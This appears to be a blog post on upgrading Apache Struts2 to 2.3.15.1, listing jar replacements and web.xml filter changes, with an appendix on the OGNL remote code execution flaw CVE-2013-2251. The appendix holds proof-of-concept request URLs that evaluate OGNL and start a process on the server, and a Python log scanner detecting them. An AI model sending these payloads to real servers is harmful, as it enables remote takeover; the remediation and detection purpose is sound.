Struts2 vulnerability description and detailed steps for upgrading to 2.3.15.1

1. JAR changes
Removed JAR                    ===>  Added JAR
asm.jar                        ===>  asm-3.3.jar
asm-attrs.jar                  ===>  asm-attrs-2.2.3.jar
cglib-2.1.jar                  ===>  cglib-nodep-2.2.2.jar
commons-beanutils.jar          ===>  commons-beanutils-1.8.0.jar
commons-fileupload-1.1.1.jar   ===>  commons-fileupload-1.3.jar
commons-io-1.3.2.jar           ===>  commons-io-2.0.1.jar
commons-lang.jar               ===>  commons-lang-2.4.jar
commons-logging-1.0.4.jar      ===>  commons-logging-1.1.3.jar
commons-logging-1.1.jar        ===>  (none)
ognl-3.0.1.jar                 ===>  ognl-3.0.6.jar
struts2-core-2.2.3.jar         ===>  struts2-core-2.3.15.1.jar
struts2-json-plugin-2.2.3.jar  ===>  struts2-json-plugin-2.3.15.1.jar
wsdl4j-1.5.1.jar               ===>  wsdl4j-1.6.2.jar
wsdl4j-1.6.1.jar               ===>  (none)
xwork-core-2.2.3.jar           ===>  xwork-core-2.3.15.1.jar
Newly introduced               ===>  asm-commons-3.3.jar
Newly introduced               ===>  c3p0-0.9.1.2.jar
Newly introduced               ===>  commons-lang3-3.1.jar
Newly introduced               ===>  jms-1.1.jar
Newly introduced               ===>  struts2-convention-plugin-2.3.15.1.jar
Newly introduced               ===>  struts2-spring-plugin-2.3.15.1.jar


2. Related error messages and their fixes

2.0 Set devMode to false

2.1 The "ActionContextCleanUp <<< is deprecated! Please use the new filters" warning

***************************************************************************
*                                 WARNING!!!                              *
* >>> ActionContextCleanUp <<< is deprecated! Please use the new filters! *
*             This can be a source of unpredictable problems!             *
*                Please refer to the docs for more details!               *
*              http://struts.apache.org/2.x/docs/webxml.html              *
***************************************************************************

    In web.xml, change *.FilterDispatcher to *.ng.filter.StrutsPrepareAndExecuteFilter.
    FilterDispatcher is the core filter of Struts 2.0.x through 2.1.2.
    StrutsPrepareAndExecuteFilter has replaced FilterDispatcher since 2.1.3.
    StrutsPrepareAndExecuteFilter is the combination of StrutsPrepareFilter and StrutsExecuteFilter.

Comment out the following code:

    <filter>
        <filter-name>struts-cleanup</filter-name>
        <filter-class>org.apache.struts2.dispatcher.ActionContextCleanUp</filter-class>
    </filter>
    <filter-mapping>
        <filter-name>struts-cleanup</filter-name>
        <url-pattern>/*</url-pattern>
    </filter-mapping>
    <filter>
        <filter-name>struts2</filter-name>
        <filter-class>org.apache.struts2.dispatcher.FilterDispatcher</filter-class>
        <!--<init-param>
            <param-name>actionPackages</param-name>
            <param-value>cn.xkshow.demo.action</param-value>
        </init-param>-->
    </filter>
    <filter-mapping>
        <filter-name>struts2</filter-name>
        <url-pattern>*.shtml</url-pattern>
        <!--<dispatcher>FORWARD</dispatcher>
        <dispatcher>REQUEST</dispatcher> -->
    </filter-mapping>
Replace the commented-out code with:

    <filter>
        <filter-name>struts2</filter-name>
        <filter-class>org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter</filter-class>
        <!-- <init-param></init-param> -->
    </filter>
    <filter-mapping>
        <filter-name>struts2</filter-name>
        <url-pattern>*.shtml</url-pattern>
    </filter-mapping>

      

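Appendix: Struts2 hit by another remote code execution vulnerability

Struts has been hit by another remote code execution vulnerability! In this vulnerability, an attacker can execute malicious code remotely by manipulating request parameters. In versions before Struts 2.3.15.1, the content of parameters prefixed with action:, redirect: and redirectAction: is not properly filtered, which leads to OGNL code execution.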

Description

Affected versions    Struts 2.0.0 - Struts 2.3.15
Reporter             Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
CVE ID               CVE-2013-2251

Proof of concept

The parameter is evaluated as an OGNL expression

http://host/struts2-blank/example/X.action?action:%25{3*4}

http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}

Code execution

http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}


http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

 

How the vulnerability works

The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with “action:” or “redirect:”, followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.

In Struts 2 before 2.3.15.1 the information following “action:”, “redirect:” or “redirectAction:” is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
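A defender-side check for the request shape described above, as an added example that is not part of the original post: it scans access-log lines for parameter names that start with "action:", "redirect:" or "redirectAction:" and continue with an OGNL expression opener. The combined log format, the sample lines and all function names are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Parameter-name prefixes handled by DefaultActionMapper (named on this page).
PREFIXES = ("action:", "redirect:", "redirectAction:")
# OGNL expression openers: %{...} and ${...}.
OGNL_OPEN = re.compile(r"[%$]\{")
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD|PUT) (\S+) HTTP/[\d.]+"')

def decode_fully(s, rounds=3):
    """URL-decode repeatedly so %2525%7B and %25{ both end up as %{."""
    for _ in range(rounds):
        d = unquote_plus(s)
        if d == s:
            break
        s = d
    return s

def suspicious_params(url):
    """Return decoded parameter names that carry a mapper prefix plus an OGNL opener."""
    hits = []
    # Split on raw separators first, then decode, so an encoded '&' cannot shift boundaries.
    for pair in re.split(r"[&;]", urlsplit(url).query):
        name = decode_fully(pair.split("=", 1)[0])
        if any(name.startswith(p) and OGNL_OPEN.search(name[len(p):]) for p in PREFIXES):
            hits.append(name)
    return hits

def scan_log(lines):
    """Return (line_number, client_ip, hits) for each flagged access-log line."""
    out = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        hits = suspicious_params(m.group(1)) if m else []
        if hits:
            out.append((n, line.split(" ", 1)[0], hits))
    return out

# Constructed sample log lines (documentation IP ranges); the expression is the page's 3*4 probe.
SAMPLE = [
    '203.0.113.7 - - [20/Jul/2013:10:01:02 +0800] "GET /struts2-blank/example/X.action?action:%25{3*4} HTTP/1.1" 200 512',
    '203.0.113.7 - - [20/Jul/2013:10:01:05 +0800] "GET /struts2-showcase/employee/save.action?redirect:%2525%7B3*4%7D HTTP/1.1" 302 0',
    '198.51.100.4 - - [20/Jul/2013:10:02:00 +0800] "GET /shop/list.shtml?action=view&page=2 HTTP/1.1" 200 2048',
    '198.51.100.4 - - [20/Jul/2013:10:02:09 +0800] "GET /login.shtml?redirect=/home.shtml HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for n, ip, hits in scan_log(SAMPLE):
        print(f"line {n}: {ip} -> {hits}")
```

Parameters sent in a POST body do not appear in access logs, so this check covers query strings only.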

